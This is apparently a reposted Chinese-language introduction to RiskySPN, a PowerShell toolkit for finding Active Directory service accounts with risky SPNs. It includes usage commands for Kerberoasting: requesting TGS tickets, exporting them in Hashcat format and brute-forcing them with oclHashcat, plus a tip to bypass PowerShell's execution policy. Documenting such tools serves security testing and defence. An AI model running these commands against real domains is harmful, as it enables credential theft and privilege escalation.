关于RiskySPN
RiskySPN是一系列功能强大的PowerShell脚本集合,可以帮助广大研究人员检测和滥用跟SPN(服务主体名称)相关的账户。除此之外,该工具不仅可以帮助蓝队研究人员识别存在安全风险的SPN,还可以帮助红队研究人员利用Kerberos和活动目录来实现权限提升。
工具要求
由于该工具中的脚本模块基于PowerShell实现,因此我们需要在能够运行PowerShell脚本的设备上使用该工具。
工具安装
广大研究人员可以直接使用下列命令将该项目源码克隆至本地:
git clone https://github.com/cyberark/RiskySPN.git
(向右滑动,查看更多)
工具使用
安装模块
Import-Module .RiskySPNs.psm1
或者,直接加载项目中的功能脚本:
. .Find-PotentiallyCrackableAccounts.ps1
(向右滑动,查看更多)
注意:这里需要确保Set-ExecutionPolicy的值设置成了Unrestricted或Bypass。
查看某个函数模块的详细功能信息
Get-Help Get-TGSCipher -Full
注意:所有的功能函数都提供了-Verbose模式。
搜索存在安全漏洞的SPN(服务主体名称)
搜索存在安全漏洞的账户:
Find-PotentiallyCrackableAccounts
敏感数据 + RC4 = $$$
生成包含漏洞账户的详细分析报告(CISO < 3):
Export-PotentiallyCrackableAccounts
获取凭证信息
请求Kerberos TGS:
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
或
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
(向右滑动,查看更多)
其他使用方法
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3
(向右滑动,查看更多)
许可证协议
本项目的开发与发布遵循GPL-3.0开源许可证协议。
项目地址
RiskySPN:https://github.com/cyberark/RiskySPN
【
原文始发于微信公众号(FreeBuf):如何使用RiskySPN检测和利用不安全的服务主体名称SPN
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论